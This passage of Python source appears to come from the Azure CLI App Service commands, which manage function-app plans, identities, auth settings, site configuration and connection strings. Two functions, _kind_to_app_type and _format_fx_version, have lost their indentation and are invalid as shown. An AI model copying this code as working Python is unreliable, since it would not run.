                       ('https_only', https_only)):
        if flag is not None:
            setattr(instance, attr, flag == 'true')
    return instance
def update_functionapp(cmd, instance, plan=None, force=False):
    """Update a function app, optionally moving it onto another App Service plan."""
    client = web_client_factory(cmd.cli_ctx)
    if plan is None:
        return instance
    if is_valid_resource_id(plan):
        parts = parse_resource_id(plan)
        dest_plan_info = client.app_service_plans.get(parts['resource_group'], parts['name'])
    else:
        # plan given by bare name: assume it lives in the app's own resource group
        dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
    if dest_plan_info is None:
        raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
    validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
    instance.server_farm_id = dest_plan_info.id
    return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
    """Validate that a functionapp plan move is Consumption <-> Elastic Premium.

    Only Windows-to-Windows moves are supported; Premium -> Consumption
    additionally requires --force. Raises on any violation.
    """
    general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
    src_parts = parse_resource_id(src_functionapp_instance.server_farm_id)
    src_plan_info = client.app_service_plans.get(src_parts['resource_group'], src_parts['name'])
    if src_plan_info is None:
        raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
    # reserved == True marks a Linux plan; only windows-to-windows is supported
    if src_plan_info.reserved or dest_plan_instance.reserved:
        raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
                              'migrations, please redeploy.')
    src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
    dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
    if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
        raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
                              general_switch_msg)
    if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
        raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
                              'Elastic Premium plan. ' +
                              general_switch_msg)
    if src_is_premium and dest_is_consumption:
        logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
                       'functionality and cause the app to break. Please ensure the functionapp is compatible '
                       'with a Consumption plan and is not using any features only available in Premium.')
        if not force:
            raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
                                               'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
    """Write back a function app site object (generic updater setter)."""
    site_envelope = kwargs['parameters']
    web_client = web_client_factory(cmd.cli_ctx)
    return web_client.web_apps.begin_create_or_update(resource_group_name, name,
                                                      site_envelope=site_envelope)
def get_functionapp(cmd, resource_group_name, name, slot=None):
    """Fetch a site and verify it is really a function app."""
    app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    is_functionapp = bool(app) and 'function' in app.kind
    if not is_functionapp:
        raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
    return app
def show_functionapp(cmd, resource_group_name, name, slot=None):
    """Show details of a function app (optionally a deployment slot)."""
    app_type = 'functionapp'
    return _show_app(cmd, resource_group_name, name, app_type, slot)
def list_webapp(cmd, resource_group_name=None):
    """List web apps, excluding function apps and apps with no kind."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    # ignore apps with kind==null & function apps
    return [app for app in apps
            if app.kind is not None and "function" not in app.kind.lower()]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    """List deleted apps, ordered by their deleted-site id."""
    deleted = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
    deleted.sort(key=lambda site: site.deleted_site_id)
    return deleted
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
    """Restore a previously deleted app into an existing site (or slot)."""
    DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
    recover_config = not restore_content_only
    request = DeletedAppRestoreRequest(deleted_site_id=deleted_id,
                                       recover_configuration=recover_config)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'begin_restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
    """List only function apps (kind contains 'function')."""
    return [app for app in _list_app(cmd.cli_ctx, resource_group_name)
            if app.kind is not None and "function" in app.kind.lower()]
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
    """Fetch an app, verify its kind matches the expected app type, and enrich it.

    cmd_app_type is a plain string ('webapp'/'functionapp'), matching what
    _kind_to_app_type returns. Raises ResourceNotFoundError when the app is
    missing or is of a different type.
    """
    app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not app:
        raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
                                    cmd_app_type, name, resource_group_name))
    app_type = _kind_to_app_type(app.kind) if app else None
    if app_type != cmd_app_type:
        # bug fix: both app_type and cmd_app_type are plain strings
        # (_kind_to_app_type returns 'webapp'/'functionapp'/'logicapp'), so the
        # previous `.value` accesses raised AttributeError instead of the
        # intended, helpful error message.
        raise ResourceNotFoundError(
            "Unable to find {} '{}', in RG '{}'".format(cmd_app_type, name, resource_group_name),
            "Use 'az {} show' to show {}s".format(app_type, app_type))
    app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
    _rename_server_farm_props(app)
    _fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
    return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
    """List sites (optionally for one resource group), normalizing plan props."""
    web_client = web_client_factory(cli_ctx)
    if resource_group_name:
        sites = web_client.web_apps.list_by_resource_group(resource_group_name)
    else:
        sites = web_client.web_apps.list()
    apps = list(sites)
    for app in apps:
        _rename_server_farm_props(app)
    return apps
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
    """Collect deleted sites across all applicable locations, then filter them."""
    web_client = web_client_factory(cli_ctx)
    deleted = []
    for location in _get_deleted_apps_locations(cli_ctx):
        deleted.extend(web_client.deleted_web_apps.list_by_location(location))
    if resource_group_name:
        deleted = [d for d in deleted if d.resource_group == resource_group_name]
    if name:
        wanted = name.lower()
        deleted = [d for d in deleted if d.deleted_site_name.lower() == wanted]
    if slot:
        wanted_slot = slot.lower()
        deleted = [d for d in deleted if d.slot.lower() == wanted_slot]
    return deleted
def _build_identities_info(identities):
    """Split an identity id list into the pieces the identity commands need.

    Returns (ARM identity dict, comma-joined type string, user-assigned ids,
    whether the system-assigned identity is involved). An empty/None input
    implies SystemAssigned only.
    """
    from ._appservice_utils import MSI_LOCAL_ID
    identities = identities or []
    external_identities = [identity for identity in identities if identity != MSI_LOCAL_ID]
    types = []
    if not identities or MSI_LOCAL_ID in identities:
        types.append('SystemAssigned')
    if external_identities:
        types.append('UserAssigned')
    identity_types = ','.join(types)
    info = {'type': identity_types}
    if external_identities:
        info['userAssignedIdentities'] = {identity: {} for identity in external_identities}
    return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
    """Enable system- and/or user-assigned managed identity on an app.

    assign_identities may contain user-identity resource ids and/or the local
    (system) identity sentinel; role/scope drive an optional RBAC assignment
    created by the shared ARM helper. Returns the resulting identity block.
    """
    ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
                                                                  'ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties')  # pylint: disable=line-too-long
    _, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)

    def getter():
        # re-fetch current site state; the ARM helper may call this repeatedly
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        # Decide the resulting identity type: as soon as both kinds are in
        # play (already present or being added), the combined type is needed.
        if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities:
            identity_types = ResourceIdentityType.user_assigned
        else:
            identity_types = ResourceIdentityType.system_assigned
        if webapp.identity:
            webapp.identity.type = identity_types
        else:
            webapp.identity = ManagedServiceIdentity(type=identity_types)
        if external_identities:
            # merge the new user-assigned ids into whatever is already attached
            if not webapp.identity.user_assigned_identities:
                webapp.identity.user_assigned_identities = {}
            for identity in external_identities:
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()

        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
                                         extra_parameter=webapp, slot=slot)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
    return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
    """Return the managed-identity block of an app (or slot)."""
    app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not app:
        raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
    return app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
    """Remove system- and/or user-assigned managed identities from an app.

    remove_identities may contain user-identity resource ids and/or the local
    (system) identity sentinel. Returns the resulting identity block.
    """
    IdentityType = cmd.get_models('ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties')  # pylint: disable=line-too-long
    _, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)

    def getter():
        # re-fetch current site state; the ARM helper may call this repeatedly
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        if webapp.identity is None:
            # nothing to remove
            return webapp
        to_remove = []
        # lower-cased ids of the user-assigned identities currently attached
        existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
        if external_identities:
            to_remove = {x.lower() for x in external_identities}
            non_existing = to_remove.difference(existing_identities)
            if non_existing:
                raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
            if not list(existing_identities - to_remove):
                # removing the last user-assigned identity: downgrade the type
                if webapp.identity.type == IdentityType.user_assigned:
                    webapp.identity.type = IdentityType.none
                elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
                    webapp.identity.type = IdentityType.system_assigned
        # the map is rebuilt below from the survivors
        webapp.identity.user_assigned_identities = None
        if remove_local_identity:
            webapp.identity.type = (IdentityType.none
                                    if webapp.identity.type == IdentityType.system_assigned or
                                    webapp.identity.type == IdentityType.none
                                    else IdentityType.user_assigned)

        if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
            webapp.identity.user_assigned_identities = {}
        if to_remove:
            # keep only the identities not asked to be removed
            for identity in list(existing_identities - to_remove):
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        else:
            for identity in list(existing_identities):
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()

        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter)
    return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
    """Read the (classic) authentication settings of an app or slot."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
    """Validate --runtime-version: None, '~N' (pinned major), or 'X.Y.Z'.

    Each numeric part must parse as an int (so int()-accepted forms such as
    negatives or surrounding whitespace pass, matching int semantics).
    """
    def _is_int(text):
        try:
            int(text)
        except ValueError:
            return False
        return True

    if runtime_version is None:
        return True
    # pinned-major form, e.g. '~2'
    if runtime_version.startswith("~") and len(runtime_version) > 1:
        return _is_int(runtime_version[1:])
    parts = runtime_version.split('.')
    return len(parts) == 3 and all(_is_int(part) for part in parts)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None,  # pylint: disable=unused-argument
                         client_id=None, token_store_enabled=None, runtime_version=None,  # pylint: disable=unused-argument
                         token_refresh_extension_hours=None,  # pylint: disable=unused-argument
                         allowed_external_redirect_urls=None, client_secret=None,  # pylint: disable=unused-argument
                         client_secret_certificate_thumbprint=None,  # pylint: disable=unused-argument
                         allowed_audiences=None, issuer=None, facebook_app_id=None,  # pylint: disable=unused-argument
                         facebook_app_secret=None, facebook_oauth_scopes=None,  # pylint: disable=unused-argument
                         twitter_consumer_key=None, twitter_consumer_secret=None,  # pylint: disable=unused-argument
                         google_client_id=None, google_client_secret=None,  # pylint: disable=unused-argument
                         google_oauth_scopes=None, microsoft_account_client_id=None,  # pylint: disable=unused-argument
                         microsoft_account_client_secret=None,  # pylint: disable=unused-argument
                         microsoft_account_oauth_scopes=None, slot=None):  # pylint: disable=unused-argument
    """Update classic auth settings; parameter names mirror the settings model.

    Every keyword maps 1:1 onto an attribute of the auth-settings object and is
    copied via reflection below — do not rename/reorder parameters without
    adjusting the `args[2:]` slice.
    """
    auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
    UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
    if action == 'AllowAnonymous':
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
    elif action:
        # any other action means "redirect" with that provider as default
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
        auth_settings.default_provider = AUTH_TYPES[action]
    # validate runtime version
    if not is_auth_runtime_version_valid(runtime_version):
        raise CLIError('Usage Error: --runtime-version set to invalid value')

    import inspect
    frame = inspect.currentframe()
    # these arrive as 'true'/'false' strings and must become real booleans
    bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method

    # copy every supplied (truthy) parameter onto the settings object;
    # NOTE(review): args[2:] also includes 'name' and 'slot' — presumably
    # intentional/benign, but confirm before changing the slice
    for arg in args[2:]:
        if values.get(arg, None):
            setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')

    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
    """List the instance identifiers an app (or slot) is running on."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
    """Query the stacks API for the supported runtime display names."""
    helper = _StackRuntimeHelper(cmd=cmd, client=web_client_factory(cmd.cli_ctx), linux=linux)
    return [stack['displayName'] for stack in helper.stacks]
def list_runtimes_hardcoded(linux=False):
    """Return runtime display names from the bundled stacks JSON file."""
    platform_key = 'linux' if linux else 'windows'
    return [stack['displayName'] for stack in get_file_json(RUNTIME_STACKS)[platform_key]]
def delete_function_app(cmd, resource_group_name, name, slot=None):
    """Delete a function app (or one of its slots)."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
                  keep_dns_registration=None, slot=None):  # pylint: disable=unused-argument
    """Delete a web app or slot; --keep-* flags suppress metric/plan cleanup."""
    client = web_client_factory(cmd.cli_ctx)
    # None lets the service apply its defaults; False explicitly opts out
    delete_metrics = False if keep_metrics else None
    delete_empty_server_farm = False if keep_empty_plan else None
    if slot:
        client.web_apps.delete_slot(resource_group_name, name, slot,
                                    delete_metrics=delete_metrics,
                                    delete_empty_server_farm=delete_empty_server_farm)
    else:
        client.web_apps.delete(resource_group_name, name,
                               delete_metrics=delete_metrics,
                               delete_empty_server_farm=delete_empty_server_farm)
def stop_webapp(cmd, resource_group_name, name, slot=None):
    """Stop an app (or the given slot)."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
    """Start an app (or the given slot)."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
    """Restart an app (or the given slot)."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
    """Read the site configuration of an app or slot."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
    """Return app settings, flagging the ones that are slot-sticky."""
    settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(
        resource_group_name, name).app_setting_names
    return _build_app_settings_output(settings.properties, sticky_names)
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
                                 should_have=None, should_not_have=None, should_contain=None):
    """Check that app settings propagated to the Kudu (scm) site.

    should_have: setting names expected to be present.
    should_not_have: setting names expected to be absent.
    should_contain: name->value pairs expected to match exactly.
    Returns True when every expectation holds.
    """
    scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
    present = set(scm_settings)
    if should_have and not set(should_have) <= present:
        return False
    if should_not_have and set(should_not_have) & present:
        return False
    # merging the expected values must be a no-op if they already match
    merged = dict(scm_settings)
    merged.update(should_contain or {})
    return merged == scm_settings
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
    """Fetch the live app settings from the Kudu api/settings endpoint."""
    import requests
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    headers = {
        'Content-Type': 'application/octet-stream',
        'Cache-Control': 'no-cache',
        'User-Agent': get_az_user_agent(),
    }
    response = requests.get('{}/api/settings'.format(scm_url), headers=headers,
                            auth=(username, password), timeout=3)
    return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
    """Return connection strings, flagging slot-sticky entries."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky = client.web_apps.list_slot_configuration_names(
        resource_group_name, name).connection_string_names or []
    return [{'name': key,
             'value': conn_strings.properties[key].value,
             'type': conn_strings.properties[key].type,
             'slotSetting': key in sticky} for key in conn_strings.properties]
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
    """Return Azure storage mounts, flagging slot-sticky entries."""
    client = web_client_factory(cmd.cli_ctx)
    mounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'list_azure_storage_accounts', slot)
    sticky = client.web_apps.list_slot_configuration_names(
        resource_group_name, name).azure_storage_config_names or []
    return [{'name': key,
             'value': mounts.properties[key],
             'slotSetting': key in sticky} for key in mounts.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
    """Attach the FTP publish URL (when one exists) onto the webapp object."""
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    ftp_urls = (profile['publishUrl'] for profile in profiles
                if profile['publishMethod'] == 'FTP')
    _missing = object()
    url = next(ftp_urls, _missing)
    if url is not _missing:
        webapp.ftpPublishingUrl = url
    return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
    """Set the container FxVersion on the OS-appropriate site-config field."""
    fx_version = _format_fx_version(custom_image_name)
    web_app = get_webapp(cmd, resource_group_name, name, slot)
    if not web_app:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    # reserved == Linux; is_xenon == Windows container
    is_linux = web_app.reserved or not web_app.is_xenon
    return update_site_configs(cmd, resource_group_name, name,
                               linux_fx_version=fx_version if is_linux else None,
                               windows_fx_version=fx_version if web_app.is_xenon else None,
                               slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
    """Blank out linuxFxVersion (a single space clears it server-side)."""
    return update_site_configs(
        cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
    """Return whichever FxVersion (linux or windows) is set, else ''."""
    config = get_site_configs(cmd, resource_group_name, name, slot)
    return config.linux_fx_version or config.windows_fx_version or ''
def url_validator(url):
    """Return True only when url parses with a scheme, a host and a path."""
    try:
        parsed = urlparse(url)
    except ValueError:
        return False
    return bool(parsed.scheme and parsed.netloc and parsed.path)
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
    """Decode the base64 config payload of a multi-container FxVersion."""
    from base64 import b64decode
    fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
    if not any(fx_version.startswith(prefix) for prefix in MULTI_CONTAINER_TYPES):
        raise CLIError("Cannot decode config that is not one of the"
                       " following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
    encoded = fx_version.split('|')[1]
    return b64decode(encoded.encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
    """Read a multi-container config (local path or URL) and base64-encode it."""
    from base64 import b64encode
    if url_validator(file_name):
        response = urlopen(file_name, context=_ssl_context())
        config_file_bytes = response.read()
    else:
        with open(file_name, 'rb') as config_file:
            config_file_bytes = config_file.read()
    # return the payload as a base64 string
    return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
                        windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
                        python_version=None, net_framework_version=None,
                        java_version=None, java_container=None, java_container_version=None,
                        remote_debugging_enabled=None, web_sockets_enabled=None,
                        always_on=None, auto_heal_enabled=None,
                        use32_bit_worker_process=None,
                        min_tls_version=None,
                        http20_enabled=None,
                        app_command_line=None,
                        ftps_state=None,
                        vnet_route_all_enabled=None,
                        generic_configurations=None):
    """Update site configuration; keyword names map 1:1 onto config attributes.

    Values are copied by reflection (`args[3:]` below), so parameter names and
    order are part of the contract. generic_configurations accepts either
    JSON blobs or key=value strings for properties without a dedicated flag.
    """
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
    if linux_fx_version:
        # custom container images must not get the shared-storage overlay
        if linux_fx_version.strip().lower().startswith('docker|'):
            update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
        else:
            delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])

    if pre_warmed_instance_count is not None:
        pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
                                                               min_val=0, max_val=20)
    import inspect
    frame = inspect.currentframe()
    # these arrive as 'true'/'false' strings and must become real booleans
    bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
                  'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
    int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    # NOTE(review): args[3:] starts at 'slot', so a truthy slot is also set on
    # the configs object — presumably benign; confirm before changing the slice
    for arg in args[3:]:
        if arg in int_flags and values[arg] is not None:
            values[arg] = validate_and_convert_to_int(arg, values[arg])
        if arg != 'generic_configurations' and values.get(arg, None):
            setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')

    generic_configurations = generic_configurations or []
    # https://github.com/Azure/azure-cli/issues/14857
    updating_ip_security_restrictions = False

    result = {}
    for s in generic_configurations:
        try:
            # a value may be a JSON object carrying several config properties
            json_object = get_json_object(s)
            for config_name in json_object:
                if config_name.lower() == 'ip_security_restrictions':
                    updating_ip_security_restrictions = True
            result.update(json_object)
        except CLIError:
            # fall back to plain key=value
            config_name, value = s.split('=', 1)
            result[config_name] = value

    for config_name, value in result.items():
        if config_name.lower() == 'ip_security_restrictions':
            updating_ip_security_restrictions = True
        setattr(configs, config_name, value)

    # avoid round-tripping restriction lists unless explicitly requested
    if not updating_ip_security_restrictions:
        setattr(configs, 'ip_security_restrictions', None)
        setattr(configs, 'scm_ip_security_restrictions', None)

    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove app settings; also unmark them as slot-sticky when applicable."""
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for setting_name in setting_names:
        app_settings.properties.pop(setting_name, None)
        if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
            slot_cfg_names.app_setting_names.remove(setting_name)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings, slot, client)
    return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
    """Remove one Azure storage mount; also unmark it as slot-sticky."""
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    azure_storage_accounts.properties.pop(custom_id, None)
    sticky = slot_cfg_names.azure_storage_config_names
    if sticky and custom_id in sticky:
        sticky.remove(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts,
                                         slot, client)
    return result.properties
def _ssl_context():
    """Return an SSL context, with a legacy fallback for old Pythons and for
    Windows Cloud Shell where the default context may not be usable."""
    # bug fix: `sys.platform` is a string ('win32', 'linux', ...), not the
    # `platform` module, so `sys.platform.system()` raised AttributeError
    # whenever in_cloud_console() was true.
    import platform
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
        try:
            return ssl.SSLContext(ssl.PROTOCOL_TLS)  # added in python 2.7.13 and 3.6
        except AttributeError:
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
    """Shape app settings into the CLI's list-of-dicts output, masking creds."""
    sticky = slot_cfg_names or []
    return [{'name': setting,
             'value': app_settings[setting],
             'slotSetting': setting in sticky}
            for setting in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
                              settings=None, slot=None, slot_settings=None):
    """Add/update connection strings; slot_settings entries also become sticky."""
    from azure.mgmt.web.models import ConnStringValueTypePair
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []

    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    for name_value in settings + slot_settings:
        # split at the first '='; a connection string name cannot contain '='
        conn_string_name, value = name_value.split('=', 1)
        if value[0] in ("'", '"'):  # strip away the quotes used as separators
            value = value[1:-1]
        conn_strings.properties[conn_string_name] = ConnStringValueTypePair(
            value=value, type=connection_string_type)

    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_connection_strings',
                                         conn_strings, slot, client)
    if slot_settings:
        sticky_names = [entry.split('=', 1)[0] for entry in slot_settings]
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.connection_string_names = (slot_cfg_names.connection_string_names or []) + sticky_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)

    return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove connection strings; also unmark slot-sticky entries."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
